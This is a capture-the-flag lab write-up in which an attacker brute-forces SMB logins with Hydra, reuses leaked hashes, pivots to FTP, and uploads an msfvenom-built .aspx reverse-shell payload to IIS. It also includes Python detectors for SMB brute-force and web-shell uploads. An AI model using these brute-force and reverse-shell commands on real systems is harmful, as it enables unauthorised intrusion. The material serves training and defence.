CTF 2 - Exploitation


Question 1

Looks like SMB user tom has not changed his password for a very long time

First, let's run an Nmap service-version and default-script scan against port 445, the port SMB listens on. Since we know that tom has a weak password, we can brute-force it with Hydra:

hydra -l tom -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target.ine.local smb

Alternatively, the Metasploit module smb_login can perform the same brute-force and will also open an SMB session for us. Next, list the shares, either from the Metasploit session or with smbmap. I'm going to use smbmap in this case:

smbmap -H target.ine.local -u tom -p felipe

Now that we can see there are only three shares we can access, let's connect to them. In this case I'm going to switch to my Metasploit session to do so, but you can also connect with smbclient. After connecting to the shares, list their contents to find the flag.

Question 2

Using the NTLM hash list discovered in the previous challenge, can you compromise the user nancy?

From the previous task, we logged into the HRDocuments share to find the flag; that share also contained a file called leakedhashes.txt. Download that file and use it as the PASS_FILE password list for the Metasploit smb_login module. Also set SMBUser to nancy and run the brute-force. Now that we have a session, we can view the shares and try each one until we are allowed access. Finally, list the contents to find the flag.
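The two challenges above both rely on repeated SMB logon failures from one host: a wordlist against a single account (tom), then a leaked hash list against another (nancy). From the defender's side, that pattern is what an SMB brute-force detection keys on. The following is an added example, not part of the original walkthrough, that runs such a detection over constructed records shaped like Windows Security events 4625 (failed logon) and 4624 (successful logon) with logon type 3 (network, which SMB uses). The tuple layout, the IP addresses and the threshold and window values are assumptions chosen for illustration.

```python
"""Detect SMB brute-force and password-spray patterns from logon events.

Added defensive example. SAMPLE_EVENTS is constructed to resemble Windows
Security events 4625/4624 with logon type 3; the field layout, addresses,
threshold and window are assumptions for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event_id, logon_type, target_user, source_ip)
SAMPLE_EVENTS = [
    # eight failures for one account from one host within seconds (wordlist attack)
    (f"2024-01-01 10:00:0{i}", 4625, 3, "tom", "10.10.10.10") for i in range(8)
] + [
    ("2024-01-01 10:00:09", 4624, 3, "tom", "10.10.10.10"),     # success right after the burst
    ("2024-01-01 10:05:00", 4625, 3, "nancy", "10.10.10.20"),   # one host, many accounts (spray)
    ("2024-01-01 10:05:01", 4625, 3, "bob", "10.10.10.20"),
    ("2024-01-01 10:05:02", 4625, 3, "carol", "10.10.10.20"),
    ("2024-01-01 11:30:00", 4625, 3, "alice", "192.168.1.5"),   # single failure: benign noise
]


def parse_event(rec):
    """Turn one constructed record into a dict with a datetime timestamp."""
    ts, event_id, logon_type, user, src = rec
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
        "id": event_id,
        "ltype": logon_type,
        "user": user,
        "src": src,
    }


def detect_smb_bruteforce(records, threshold=5, window=timedelta(minutes=5)):
    """Flag (source, user) pairs with >= threshold network-logon failures inside
    a sliding window, and note whether a success from that source followed."""
    events = sorted((parse_event(r) for r in records), key=lambda e: e["ts"])
    failures = defaultdict(list)   # (src, user) -> failure timestamps in window
    alerts = {}
    for e in events:
        if e["ltype"] != 3:        # only network logons are relevant to SMB
            continue
        key = (e["src"], e["user"])
        if e["id"] == 4625:
            start = e["ts"] - window
            failures[key] = [t for t in failures[key] if t >= start] + [e["ts"]]
            if len(failures[key]) >= threshold:
                alert = alerts.setdefault(key, {"failures": 0, "success_after": False})
                alert["failures"] = len(failures[key])
        elif e["id"] == 4624 and key in alerts:
            # a success after a flagged burst suggests the password was found
            alerts[key]["success_after"] = True
    return alerts


def detect_password_spray(records, min_users=3, window=timedelta(minutes=10)):
    """Flag sources whose failures inside the window touch >= min_users accounts."""
    events = sorted((parse_event(r) for r in records), key=lambda e: e["ts"])
    by_src = defaultdict(list)     # src -> [(ts, user)] failures in window
    flagged = {}
    for e in events:
        if e["id"] != 4625 or e["ltype"] != 3:
            continue
        start = e["ts"] - window
        by_src[e["src"]] = [(t, u) for t, u in by_src[e["src"]] if t >= start] + [(e["ts"], e["user"])]
        users = {u for _, u in by_src[e["src"]]}
        if len(users) >= min_users:
            flagged[e["src"]] = sorted(users)
    return flagged


if __name__ == "__main__":
    for key, info in detect_smb_bruteforce(SAMPLE_EVENTS).items():
        print("brute-force:", key, info)
    for src, users in detect_password_spray(SAMPLE_EVENTS).items():
        print("spray:", src, users)
```

The brute-force detector keys on one account, which is what the Hydra and smb_login runs above would produce; the spray detector keys on one source hitting many accounts, which the leaked-hash reuse against other users would produce. On real hosts the same logic runs over exported 4625/4624 events, and the mitigation the challenge hints at is the obvious one: a lockout or rate-limit policy on network logons, and rotating any account whose hash appears in a leaked list.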

Question 3

I wonder what the hint found in the previous challenge will be useful for!

From the previous question, make sure to also cat or download the hints.txt file. Since we have been given credentials for something, let's look at the other open services on the system by running another Nmap scan. We can see that port 21 is open with FTP running, so let's try to connect to it using those credentials. Once connected, list the contents to find the flag.

Question 4

Can you compromise the target machine and retrieve the C://flag4.txt file?

From our Nmap scan, we can see that port 80 is also open, running Microsoft IIS. Since we have FTP access, we can upload a malicious .asp or .aspx payload to the server to gain a shell. We can use msfvenom to create a payload, or one of the pre-built web shells that ship with Kali Linux. In this case I will use msfvenom, since it gives us a Meterpreter payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f aspx > shell.aspx

We can now upload the .aspx payload to the server over FTP using the put command. Next, set up exploit/multi/handler in Metasploit with the matching payload, LHOST and LPORT. Once it is listening, browse to the .aspx file (http://target.ine.local/shell.aspx). Now that we have our Meterpreter session, navigate to the root of the C: drive and list its contents to find the last flag.
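The chain in this challenge only works because the FTP-writable directory is also served by IIS, so a file dropped with put is executed as soon as it is requested. The detection for that is a correlation between the FTP log (a completed STOR of a server-side script file) and the IIS web log (a request for that same file). The following is an added example, not part of the original walkthrough, that performs this correlation over constructed log lines. The simplified field order of both logs, the client addresses and the file names are assumptions for illustration.

```python
"""Correlate FTP uploads of script files with web requests for the same file.

Added defensive example. FTP_LOG and IIS_LOG are constructed; the simplified
field layout (date time c-ip user STOR file status / date time method uri
query port user c-ip agent status) is an assumption for illustration.
"""
import os
import re
from datetime import datetime

# Extensions IIS (or another server) would execute rather than serve as static content.
SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx", ".php", ".jsp"}

# Constructed FTP log: completed transfers report status 226.
FTP_LOG = """\
2024-01-01 10:20:00 10.10.10.10 tom STOR report.pdf 226
2024-01-01 10:20:30 10.10.10.10 tom STOR shell.aspx 226
2024-01-01 10:25:00 192.168.1.8 tom STOR notes.txt 226
2024-01-01 10:26:00 192.168.1.8 tom STOR old.asp 226
"""

# Constructed IIS W3C-style log.
IIS_LOG = """\
2024-01-01 10:21:00 GET /index.html - 80 - 192.168.1.8 Mozilla/5.0 200
2024-01-01 10:21:10 GET /shell.aspx - 80 - 10.10.10.10 Mozilla/5.0 200
"""

FTP_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) STOR (\S+) (\d+)$")
IIS_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) \S+ \d+ \S+ (\S+) \S+ (\d+)$")


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def script_uploads(ftp_log):
    """Return completed FTP uploads whose extension is server-executable."""
    uploads = []
    for line in ftp_log.splitlines():
        m = FTP_RE.match(line)
        if not m:
            continue
        ts, src, user, name, status = m.groups()
        if status != "226":          # ignore transfers that did not complete
            continue
        if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
            uploads.append({"ts": _ts(ts), "src": src, "user": user, "file": name})
    return uploads


def web_requests(iis_log):
    """Parse the constructed IIS lines into request dicts."""
    requests = []
    for line in iis_log.splitlines():
        m = IIS_RE.match(line)
        if not m:
            continue
        ts, method, uri, client, status = m.groups()
        requests.append({"ts": _ts(ts), "method": method, "uri": uri, "src": client, "status": status})
    return requests


def find_webshell_uploads(ftp_log, iis_log):
    """For each uploaded script file, report whether and from where it was requested."""
    requests = web_requests(iis_log)
    alerts = []
    for up in script_uploads(ftp_log):
        hits = [
            r for r in requests
            if r["uri"].lower().rsplit("/", 1)[-1] == up["file"].lower() and r["ts"] >= up["ts"]
        ]
        alerts.append({
            "file": up["file"],
            "uploader": up["src"],
            "user": up["user"],
            "executed": bool(hits),
            "first_request_from": hits[0]["src"] if hits else None,
            "seconds_to_first_request": int((hits[0]["ts"] - up["ts"]).total_seconds()) if hits else None,
        })
    return alerts


if __name__ == "__main__":
    for a in find_webshell_uploads(FTP_LOG, IIS_LOG):
        print(a)
```

An upload that is never requested (old.asp here) is still worth an alert, since the file sits ready to run; an upload followed within seconds by a request from the same client is the pattern this challenge produces. The structural fix is to keep the FTP root outside the web root, or to disable script execution in any directory FTP users can write to, so that an uploaded .aspx is served as text rather than run.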
